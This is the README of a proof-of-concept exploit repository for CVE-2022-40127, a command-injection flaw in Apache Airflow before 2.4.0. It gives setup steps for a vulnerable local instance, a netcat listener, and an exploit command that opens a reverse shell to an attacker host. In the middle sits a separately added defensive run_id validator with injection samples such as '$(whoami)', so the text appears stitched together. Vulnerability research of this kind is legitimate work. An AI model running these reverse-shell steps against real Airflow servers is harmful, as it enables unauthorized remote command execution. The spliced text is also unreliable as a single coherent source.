PoC for CVE-2022-40127, an Apache Airflow RCE vulnerability affecting versions prior to 2.4.0.

The official report description says:

"A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow versions prior to 2.4.0."

This repo accompanies a CVE analysis blog post published on the vsociety blog.
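As an added defensive example (not part of this repository or of Airflow itself), the following standalone validator rejects a manually supplied run_id that carries shell metacharacters, so that such a value can be refused before a DAG run is created. The allow-list, the function names and the sample values are assumptions of this example, not taken from Airflow's code.

```python
import re

# run_id values Airflow generates itself look like "manual__2022-11-15T10:00:00+00:00",
# so letters, digits, "_", ".", ":", "+" and "-" are allowed; nothing else is.
_SAFE_RUN_ID = re.compile(r"^[A-Za-z0-9_.:+-]+$")

# Characters that a templated bash command would hand to the shell unescaped.
# Any of them in a run_id is a strong signal of command injection.
_SHELL_META = re.compile(r"[;&|`$<>(){}\n\\\"']")


def check_run_id(run_id: str) -> dict:
    """Classify a user-provided run_id as {"ok": bool, "reason": str}.

    The metacharacter check runs first so that an injection attempt gets the
    specific reason; a merely odd value (e.g. a space) gets the generic one.
    """
    if not run_id:
        return {"ok": False, "reason": "empty run_id"}
    if _SHELL_META.search(run_id):
        return {"ok": False, "reason": "shell metacharacter in run_id"}
    if not _SAFE_RUN_ID.match(run_id):
        return {"ok": False, "reason": "character outside allow-list"}
    return {"ok": True, "reason": ""}


def audit_run_ids(run_ids):
    """Return (run_id, reason) for every value that fails the check."""
    results = [(r, check_run_id(r)) for r in run_ids]
    return [(r, res["reason"]) for r, res in results if not res["ok"]]


# Constructed sample values for demonstration (not from a real Airflow instance).
SAMPLE_RUN_IDS = [
    "manual__2022-11-15T10:00:00+00:00",  # default manual-trigger format: accepted
    "backfill-2022-11-15",                # plain custom label: accepted
    "release 42",                         # space: rejected, but not as injection
    "x; id",                              # command separator: rejected as injection
    "$(whoami)",                          # command substitution: rejected as injection
]

if __name__ == "__main__":
    for run_id, reason in audit_run_ids(SAMPLE_RUN_IDS):
        print(f"rejected {run_id!r}: {reason}")
```

Wiring the check into the trigger path (a form validator, an API gateway rule or a pre-trigger hook) is deployment-specific and is left to the reader; the function only decides.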
You can clone the repo:

```shell
git clone https://github.com/jakabakos/CVE-2022-40127.git
```
Download the docker-compose file from the official repo:

```shell
cd /opt/
mkdir airflow-2.3.4 && cd airflow-2.3.4
curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.3.4/docker-compose.yaml'
```

Run Airflow:

```shell
mkdir -p ./dags ./logs ./plugins
echo -e "AIRFLOW_UID=$(id -u)" > .env
docker-compose up airflow-init
docker-compose up
```

Then open localhost:8080. In this case both the username and the password will be airflow.
Based on the official install instructions:

```shell
pip3.8 install "apache-airflow==2.3.4" --constraint "https://raw.githubusercontent.com/apache/airflow/constraints-2.3.4/constraints-3.7.txt"
```

You can verify that the installation was successful with `which airflow` and/or `airflow info`.

Run Airflow:

```shell
airflow standalone
```

See the generated username and password in the logs.
First, install the required packages with pip:

```shell
pip3 install -r requirements.txt
```

See the possible options with:

```shell
python3 exploit.py --help
```

You can check whether the host can be exploited or not:

```shell
python3 exploit.py -u airflow -p airflow -url http://localhost:8080
```

Set up a local listener for the reverse shell in a different terminal session:

```shell
nc -lvnp 4242
```

Run the script in attack mode with this command:

```shell
python3 exploit.py -u airflow -p airflow -url http://localhost:8080 -a -host <attacker_ip> -port 4242
```